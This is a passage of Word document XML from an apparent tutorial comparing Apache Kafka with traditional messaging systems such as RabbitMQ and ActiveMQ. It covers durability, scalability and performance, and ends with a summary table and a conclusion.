          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Some traditional messaging systems (like RabbitMQ) provide limited support for message partitioning, but it is not as sophisticated or scalable as Kafka's partitioning.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687F9B80" w14:textId="77777777" w:rsidR="00A17F31" w:rsidRPr="0003272F" w:rsidRDefault="00A17F31"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2. Message Durability:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027D5BFD" w14:textId="77777777" w:rsidR="00A17F31" w:rsidRPr="0003272F" w:rsidRDefault="00A17F31"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3EAE43" w14:textId="77777777" w:rsidR="00A17F31" w:rsidRPr="0003272F" w:rsidRDefault="00A17F31" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="141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urable Storage</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka is designed to ensure message durability. It stores messages on disk and provides strong guarantees about message retention. Kafka topics can retain messages for a configurable period or based on size.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B00067" w14:textId="77777777" w:rsidR="00A17F31" w:rsidRPr="0003272F" w:rsidRDefault="00A17F31" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="141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og-based Storage</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka uses a log-based storage mechanism. Messages are appended to logs, and the logs are retained for a configurable retention period. Consumers can read from any point in the log.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0C6BE0" w14:textId="77777777" w:rsidR="00A17F31" w:rsidRPr="0003272F" w:rsidRDefault="00A17F31" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="141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essage Acknowledgment</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka allows producers and consumers to configure the level of acknowledgment needed for message delivery (e.g., at-most-once, at-least-once, exactly-once delivery semantics).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73933EE6" w14:textId="77777777" w:rsidR="00A17F31" w:rsidRPr="0003272F" w:rsidRDefault="00A17F31"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Traditional Messaging Systems:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E0E52E" w14:textId="77777777" w:rsidR="00A17F31" w:rsidRPr="0003272F" w:rsidRDefault="00A17F31" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="141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essage Persistence</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Traditional systems like RabbitMQ and ActiveMQ also provide message durability options, but they tend to use more conventional approaches to storing messages (e.g., databases or queues).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C4F7A5" w14:textId="77777777" w:rsidR="00A17F31" w:rsidRPr="0003272F" w:rsidRDefault="00A17F31" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="141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Acknowledgments</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Traditional systems generally require consumers to acknowledge message receipt explicitly. The durability of messages depends on whether acknowledgment is received or not. If a message is not acknowledged, it may be redelivered, leading to potential duplicates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775D3800" w14:textId="77777777" w:rsidR="00A17F31" w:rsidRPr="0003272F" w:rsidRDefault="00A17F31" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="141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essage Retention</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: In many traditional systems, once a message is consumed, it is deleted from the queue, and messages are typically not stored for long-term durability unless explicitly configured.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E3A47A5" w14:textId="77777777" w:rsidR="00A17F31" w:rsidRPr="0003272F" w:rsidRDefault="00A17F31"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3. Scalability:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CDB514B" w14:textId="77777777" w:rsidR="00A17F31" w:rsidRPr="0003272F" w:rsidRDefault="00A17F31"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74CA879B" w14:textId="77777777" w:rsidR="00A17F31" w:rsidRPr="0003272F" w:rsidRDefault="00A17F31" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="141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Horizontal Scalability</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka is designed to scale horizontally by adding more brokers to the cluster. Each broker can handle a portion of the data (via partitions), and as the volume of data grows, more brokers can be added without significant overhead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C12B97" w14:textId="77777777" w:rsidR="00A17F31" w:rsidRPr="0003272F" w:rsidRDefault="00A17F31" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="141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artitioning</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka partitions data across multiple brokers. A topic can be divided into multiple partitions, each of which can be stored on different brokers. This allows Kafka to handle high-throughput and distribute workloads efficiently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B1F115" w14:textId="77777777" w:rsidR="00A17F31" w:rsidRPr="0003272F" w:rsidRDefault="00A17F31" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="141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plication</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka replicates data across multiple brokers for fault tolerance and availability, enabling it to scale without compromising data durability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567A996E" w14:textId="77777777" w:rsidR="00A17F31" w:rsidRPr="0003272F" w:rsidRDefault="00A17F31"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Traditional Messaging Systems:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385CF2E5" w14:textId="77777777" w:rsidR="00A17F31" w:rsidRPr="0003272F" w:rsidRDefault="00A17F31" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="141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lastRenderedPageBreak/>
        <w:t>Vertical Scaling</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Traditional messaging systems tend to scale vertically, meaning you need to increase the hardware capacity of a single broker to handle more messages. Horizontal scaling may require significant changes to the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60DEFE2D" w14:textId="77777777" w:rsidR="00A17F31" w:rsidRPr="0003272F" w:rsidRDefault="00A17F31" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="141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imited Partitioning</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: While some systems like RabbitMQ allow message partitioning across multiple queues, scaling is often more difficult and doesn’t provide the level of granular control that Kafka provides.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C9ED05" w14:textId="77777777" w:rsidR="00A17F31" w:rsidRPr="0003272F" w:rsidRDefault="00A17F31" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="141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plication and Fault Tolerance</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Some traditional systems provide replication (e.g., ActiveMQ, RabbitMQ), but it is usually less efficient and less flexible compared to Kafka’s partitioning and replication approach.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E96CF82" w14:textId="77777777" w:rsidR="00A17F31" w:rsidRPr="0003272F" w:rsidRDefault="00A17F31"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4. Performance:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA356EA" w14:textId="77777777" w:rsidR="00A17F31" w:rsidRPr="0003272F" w:rsidRDefault="00A17F31"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774A1AAF" w14:textId="77777777" w:rsidR="00A17F31" w:rsidRPr="0003272F" w:rsidRDefault="00A17F31" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="142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High Throughput</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka is optimized for high throughput, capable of handling millions of messages per second with very low latency. This is possible because Kafka uses a distributed log, appends messages sequentially, and makes efficient use of disk storage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70EE96F2" w14:textId="77777777" w:rsidR="00A17F31" w:rsidRPr="0003272F" w:rsidRDefault="00A17F31" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="142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essage Compression</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka supports message compression (e.g., gzip, snappy), which helps in reducing storage costs and improving throughput.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C21A6FF" w14:textId="77777777" w:rsidR="00A17F31" w:rsidRPr="0003272F" w:rsidRDefault="00A17F31" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="142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Zero-Copy Technology</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka makes use of a zero-copy technology, which reduces disk I/O overhead and improves overall performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02103977" w14:textId="77777777" w:rsidR="00A17F31" w:rsidRPr="0003272F" w:rsidRDefault="00A17F31"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Traditional Messaging Systems:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43793FE1" w14:textId="77777777" w:rsidR="00A17F31" w:rsidRPr="0003272F" w:rsidRDefault="00A17F31" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="142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oderate Throughput</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Traditional systems like RabbitMQ or ActiveMQ are generally not as optimized for extremely high throughput compared to Kafka. They handle lower message volumes with a focus on features like flexibility and message routing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9476AE" w14:textId="77777777" w:rsidR="00A17F31" w:rsidRPr="0003272F" w:rsidRDefault="00A17F31" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="142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atency</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: While traditional messaging systems can handle moderate latency, they are not designed for ultra-low-latency message processing, especially when dealing with large volumes of data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6399B6D1" w14:textId="77777777" w:rsidR="00A17F31" w:rsidRPr="0003272F" w:rsidRDefault="00A17F31" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="142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caling Challenges</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The performance of traditional systems can degrade when scaling horizontally, as adding more nodes usually involves more complex coordination and state management.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B076651" w14:textId="77777777" w:rsidR="00A17F31"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BBE48AA">
          <v:rect id="_x0000_i3168" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="05ECE49B" w14:textId="77777777" w:rsidR="00A17F31" w:rsidRPr="0003272F" w:rsidRDefault="00A17F31"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Summary Comparis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0"/>
        <w:gridCol w:w="3777"/>
        <w:gridCol w:w="4477"/>
      </w:tblGrid>
      <w:tr w:rsidR="0003272F" w:rsidRPr="0003272F" w14:paraId="64B3A2C1" w14:textId="77777777" w:rsidTr="00A17F31">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6C0AC41B" w14:textId="77777777" w:rsidR="00A17F31" w:rsidRPr="0003272F" w:rsidRDefault="00A17F31"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Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="741229AE" w14:textId="77777777" w:rsidR="00A17F31" w:rsidRPr="0003272F" w:rsidRDefault="00A17F31"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="77D5EB5F" w14:textId="77777777" w:rsidR="00A17F31" w:rsidRPr="0003272F" w:rsidRDefault="00A17F31"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Traditional Messaging Systems</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0003272F" w:rsidRPr="0003272F" w14:paraId="075874FE" w14:textId="77777777" w:rsidTr="00A17F31">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5A77C112" w14:textId="77777777" w:rsidR="00A17F31" w:rsidRPr="0003272F" w:rsidRDefault="00A17F31"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Architecture</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3F36AC27" w14:textId="77777777" w:rsidR="00A17F31" w:rsidRPr="0003272F" w:rsidRDefault="00A17F31"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Distributed, partitioned, and replicated brokers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F771B20" w14:textId="77777777" w:rsidR="00A17F31" w:rsidRPr="0003272F" w:rsidRDefault="00A17F31"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entralized brokers or simple queues/topics</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0003272F" w:rsidRPr="0003272F" w14:paraId="572D286F" w14:textId="77777777" w:rsidTr="00A17F31">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="678CE9FF" w14:textId="77777777" w:rsidR="00A17F31" w:rsidRPr="0003272F" w:rsidRDefault="00A17F31"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essage Durability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="23F9BE8B" w14:textId="77777777" w:rsidR="00A17F31" w:rsidRPr="0003272F" w:rsidRDefault="00A17F31"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og-based, configurable retention, persistent storage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3F0FAB58" w14:textId="77777777" w:rsidR="00A17F31" w:rsidRPr="0003272F" w:rsidRDefault="00A17F31"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an be durable, but often message removed after consumption</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0003272F" w:rsidRPr="0003272F" w14:paraId="3FD9B3ED" w14:textId="77777777" w:rsidTr="00A17F31">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7A74FF84" w14:textId="77777777" w:rsidR="00A17F31" w:rsidRPr="0003272F" w:rsidRDefault="00A17F31"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calability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="757B58F2" w14:textId="77777777" w:rsidR="00A17F31" w:rsidRPr="0003272F" w:rsidRDefault="00A17F31"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Horizontally scalable, partitions for load balancing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="18102EA2" w14:textId="77777777" w:rsidR="00A17F31" w:rsidRPr="0003272F" w:rsidRDefault="00A17F31"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Vertical scaling, more complex horizontal scaling</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0003272F" w:rsidRPr="0003272F" w14:paraId="29A770FD" w14:textId="77777777" w:rsidTr="00A17F31">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1DD851FB" w14:textId="77777777" w:rsidR="00A17F31" w:rsidRPr="0003272F" w:rsidRDefault="00A17F31"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erformance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0ECDDD95" w14:textId="77777777" w:rsidR="00A17F31" w:rsidRPr="0003272F" w:rsidRDefault="00A17F31"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High throughput, low latency, log-structured, zero-copy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0ABA56FA" w14:textId="77777777" w:rsidR="00A17F31" w:rsidRPr="0003272F" w:rsidRDefault="00A17F31"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Moderate throughput, higher latency, less optimized for large-scale</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0003272F" w:rsidRPr="0003272F" w14:paraId="4D589F8C" w14:textId="77777777" w:rsidTr="00A17F31">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="17A66E48" w14:textId="77777777" w:rsidR="00A17F31" w:rsidRPr="0003272F" w:rsidRDefault="00A17F31"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Use Cases</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="66E187DC" w14:textId="77777777" w:rsidR="00A17F31" w:rsidRPr="0003272F" w:rsidRDefault="00A17F31"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Event streaming, log aggregation, real-time analytics</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7525FC9A" w14:textId="77777777" w:rsidR="00A17F31" w:rsidRPr="0003272F" w:rsidRDefault="00A17F31"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ask queuing, pub/sub, message routing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5BEDA496" w14:textId="77777777" w:rsidR="00A17F31"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DF66DCF">
          <v:rect id="_x0000_i3169" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="46CFE974" w14:textId="77777777" w:rsidR="00A17F31" w:rsidRPr="0003272F" w:rsidRDefault="00A17F31"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Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="313BF49D" w14:textId="77777777" w:rsidR="00A17F31" w:rsidRPr="0003272F" w:rsidRDefault="00A17F31" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="142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afka</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> excels in environments that require </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>high-throughput</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fault tolerance</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scalability</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event-driven architectures</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> where retaining the full history of events or stream processing is crucial.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6423ECF8" w14:textId="77777777" w:rsidR="00A17F31" w:rsidRPr="0003272F" w:rsidRDefault="00A17F31" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="142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Traditional messaging systems</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> like </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>RabbitMQ</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ActiveMQ</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JMS</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are better suited for </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>point-to-point messaging</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pub/sub models</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with a focus on reliable message delivery, message routing, and ease of use. They may not scale as efficiently as Kafka in high-volume environments but are good choices for systems that don’t require massive throughput or partitioned data storage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5146E04D" w14:textId="77777777" w:rsidR="00A17F31" w:rsidRPr="0003272F" w:rsidRDefault="00A17F31"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shines when dealing with large-scale, distributed, fault-tolerant applications, while traditional messaging systems are often used for more conventional messaging scenarios requiring flexibility, message routing, and lower complexity.</w:t>
      </w:r>
    </w:p>
